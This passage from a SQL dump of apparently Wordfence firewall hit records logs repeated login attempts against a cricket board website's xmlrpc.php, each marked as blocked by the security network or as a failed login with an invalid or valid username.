Firefox/62.0','loginFailValidUsername',NULL,NULL),(88,0.000000,1624425266.176162,'\0\0\0\0\0\0\0\0\0\0���0Z�',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(89,0.000000,1624425321.448419,'\0\0\0\0\0\0\0\0\0\0���>[�',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(90,0.000000,1624425384.077156,'\0\0\0\0\0\0\0\0\0\0���FzC',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(91,0.000000,1624425581.749908,'\0\0\0\0\0\0\0\0\0\0���X�$',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(92,0.000000,1624425646.673180,'\0\0\0\0\0\0\0\0\0\0��Xc�f',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(93,0.000000,1624425851.748386,'\0\0\0\0\0\0\0\0\0\0��-7<n',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(94,0.000000,1624425939.782993,'\0\0\0\0\0\0\0\0\0\0����u�',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(95,0.000000,1624426025.269232,'\0\0\0\0\0\0\0\0\0\0���&V�',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(96,0.000000,1624426131.196434,'\0\0\0\0\0\0\0\0\0\0����',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(97,0.000000,1624426223.775310,'\0\0\0\0\0\0\0\0\0\0���G�R',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(98,0.000000,1624426337.628424,'\0\0\0\0\0\0\0\0\0\0����f',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(99,0.000000,1624426528.921034,'\0\0\0\0\0\0\0\0\0\0���z�',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(100,0.000000,1624426656.302549,'\0\0\0\0\0\0\0\0\0\0��%��',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(101,0.000000,1624426692.991271,'\0\0\0\0\0\0\0\0\0\0��-��#',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(102,0.000000,1624426715.427817,'\0\0\0\0\0\0\0\0\0\0����`�',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(103,0.000000,1624426788.784673,'\0\0\0\0\0\0\0\0\0\0��Xc�f',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(104,0.000000,1624426859.890070,'\0\0\0\0\0\0\0\0\0\0��co�',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(105,0.000000,1624426911.222684,'\0\0\0\0\0\0\0\0\0\0��V?F',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(106,0.000000,1624426976.194649,'\0\0\0\0\0\0\0\0\0\0��2ta3',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(107,0.000000,1624427054.032915,'\0\0\0\0\0\0\0\0\0\0��Xc�f',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(108,0.000000,1624427119.009180,'\0\0\0\0\0\0\0\0\0\0����B',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(109,0.000000,1624427248.860397,'\0\0\0\0\0\0\0\0\0\0��j��',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(110,0.000000,1624427304.799395,'\0\0\0\0\0\0\0\0\0\0��z�mm',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(111,0.000000,1624427383.991002,'\0\0\0\0\0\0\0\0\0\0����\'',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(112,0.000000,1624427447.064561,'\0\0\0\0\0\0\0\0\0\0���E4�',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(113,0.000000,1624427494.939993,'\0\0\0\0\0\0\0\0\0\0���y��',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(114,0.000000,1624427697.418941,'\0\0\0\0\0\0\0\0\0\0��ν!�',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(115,0.000000,1624427764.063780,'\0\0\0\0\0\0\0\0\0\0���ń�',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(116,0.000000,1624427885.127442,'\0\0\0\0\0\0\0\0\0\0��MO�',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(117,0.000000,1624427956.521244,'\0\0\0\0\0\0\0\0\0\0���[m�',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(118,0.000000,1624428162.499338,'\0\0\0\0\0\0\0\0\0\0���z�',0,200,0,1,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(119,0.000000,1624428282.526345,'\0\0\0\0\0\0\0\0\0\0��\rCrc',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(120,0.000000,1624428470.246430,'\0\0\0\0\0\0\0\0\0\0��\r}\nJ',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(121,0.000000,1624428540.044904,'\0\0\0\0\0\0\0\0\0\0��>m	y',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(122,0.000000,1624428730.650300,'\0\0\0\0\0\0\0\0\0\0���ɧ�',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(123,0.000000,1624428950.564840,'\0\0\0\0\0\0\0\0\0\0���z�',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(124,0.000000,1624429060.507469,'\0\0\0\0\0\0\0\0\0\0��z�mm',0,200,0,1,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(125,0.000000,1624429128.901472,'\0\0\0\0\0\0\0\0\0\0��V?F',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(126,0.000000,1624429257.623115,'\0\0\0\0\0\0\0\0\0\0���A��',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(127,0.000000,1624429520.366466,'\0\0\0\0\0\0\0\0\0\0��6$�t',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(128,0.000000,1624429588.545421,'\0\0\0\0\0\0\0\0\0\0���ɧ�',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(129,0.000000,1624429646.628538,'\0\0\0\0\0\0\0\0\0\0��-O#(',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(130,0.000000,1624429722.052709,'\0\0\0\0\0\0\0\0\0\0���i�9',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(131,0.000000,1624429788.618782,'\0\0\0\0\0\0\0\0\0\0���b�',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(132,0.000000,1624429907.190174,'\0\0\0\0\0\0\0\0\0\0��UX�',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(133,0.000000,1624429965.822963,'\0\0\0\0\0\0\0\0\0\0��N/u�',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(134,0.000000,1624430218.477647,'\0\0\0\0\0\0\0\0\0\0���Dx1',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(135,0.000000,1624430354.705722,'\0\0\0\0\0\0\0\0\0\0��}�Q',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(136,0.000000,1624430384.206448,'\0\0\0\0\0\0\0\0\0\0��ɔk_',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(137,0.000000,1624430565.642542,'\0\0\0\0\0\0\0\0\0\0���Lk�',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(138,0.000000,1624430966.875332,'\0\0\0\0\0\0\0\0\0\0���0Z�',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(139,0.000000,1624431018.625218,'\0\0\0\0\0\0\0\0\0\0���~A',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(140,0.000000,1624431103.265642,'\0\0\0\0\0\0\0\0\0\0���;��',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(141,0.000000,1624431163.196536,'\0\0\0\0\0\0\0\0\0\0���A��',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(142,0.000000,1624431261.639318,'\0\0\0\0\0\0\0\0\0\0���ɧ�',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(143,0.000000,1624431410.576421,'\0\0\0\0\0\0\0\0\0\0���&V�',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(144,0.000000,1624431490.368246,'\0\0\0\0\0\0\0\0\0\0���;E�',0,200,0,1,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(145,0.000000,1624431683.532841,'\0\0\0\0\0\0\0\0\0\0��>���',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(146,0.000000,1624431886.201724,'\0\0\0\0\0\0\0\0\0\0���A��',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(147,0.000000,1624431951.459942,'\0\0\0\0\0\0\0\0\0\0���FzC',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(148,0.000000,1624432016.949578,'\0\0\0\0\0\0\0\0\0\0���?�',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(149,0.000000,1624432210.468222,'\0\0\0\0\0\0\0\0\0\0��Xc�f',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(150,0.000000,1624432285.241044,'\0\0\0\0\0\0\0\0\0\0���_l�',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(151,0.000000,1624432390.705649,'\0\0\0\0\0\0\0\0\0\0�����0',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(152,0.000000,1624432608.483795,'\0\0\0\0\0\0\0\0\0\0��Xc�f',0,200,0,1,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(153,0.000000,1624432687.639621,'\0\0\0\0\0\0\0\0\0\0���X�$',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(154,0.000000,1624432752.161938,'\0\0\0\0\0\0\0\0\0\0���H@a',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(155,0.000000,1624433083.446990,'\0\0\0\0\0\0\0\0\0\0���&V�',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(156,0.000000,1624433155.329053,'\0\0\0\0\0\0\0\0\0\0��-O#(',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(157,0.000000,1624433231.768105,'\0\0\0\0\0\0\0\0\0\0���z�',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(158,0.000000,1624433363.802196,'\0\0\0\0\0\0\0\0\0\0��ɔk_',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(159,0.000000,1624433416.485102,'\0\0\0\0\0\0\0\0\0\0��co�',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(160,0.000000,1624433556.024060,'\0\0\0\0\0\0\0\0\0\0���H@a',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(161,0.000000,1624434014.376055,'\0\0\0\0\0\0\0\0\0\0���?�',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(162,0.000000,1624434079.110716,'\0\0\0\0\0\0\0\0\0\0��Xc�f',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(163,0.000000,1624434413.330545,'\0\0\0\0\0\0\0\0\0\0����\'',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(164,0.000000,1624434484.077832,'\0\0\0\0\0\0\0\0\0\0��’)d',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(165,0.000000,1624434744.012970,'\0\0\0\0\0\0\0\0\0\0��\"�F',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(166,0.000000,1624434876.986096,'\0\0\0\0\0\0\0\0\0\0����f',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(167,0.000000,1624434969.016688,'\0\0\0\0\0\0\0\0\0\0���;��',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(168,0.000000,1624435029.731736,'\0\0\0\0\0\0\0\0\0\0����u�',0,200,0,1,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(169,0.000000,1624435158.946979,'\0\0\0\0\0\0\0\0\0\0���ń�',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(170,0.000000,1624435268.105089,'\0\0\0\0\0\0\0\0\0\0��F#ŕ',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(171,0.000000,1624435340.284813,'\0\0\0\0\0\0\0\0\0\0��>���',0,200,0,1,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(172,0.000000,1624435423.982199,'\0\0\0\0\0\0\0\0\0\0��-��#',0,200,0,1,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(173,0.000000,1624435538.894399,'\0\0\0\0\0\0\0\0\0\0��UX�',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(174,0.000000,1624435600.575774,'\0\0\0\0\0\0\0\0\0\0����2<',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(175,0.000000,1624435896.845473,'\0\0\0\0\0\0\0\0\0\0��_�E�',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(176,0.000000,1624435939.966750,'\0\0\0\0\0\0\0\0\0\0����9d',0,200,0,1,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(177,0.000000,1624436000.550276,'\0\0\0\0\0\0\0\0\0\0���Lk�',0,200,0,1,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(178,0.000000,1624436076.244213,'\0\0\0\0\0\0\0\0\0\0����2<',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(179,0.000000,1624436141.688153,'\0\0\0\0\0\0\0\0\0\0��Xc�f',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(180,0.000000,1624436291.187805,'\0\0\0\0\0\0\0\0\0\0��\'a�',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(181,0.000000,1624436348.734296,'\0\0\0\0\0\0\0\0\0\0��z�mm',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 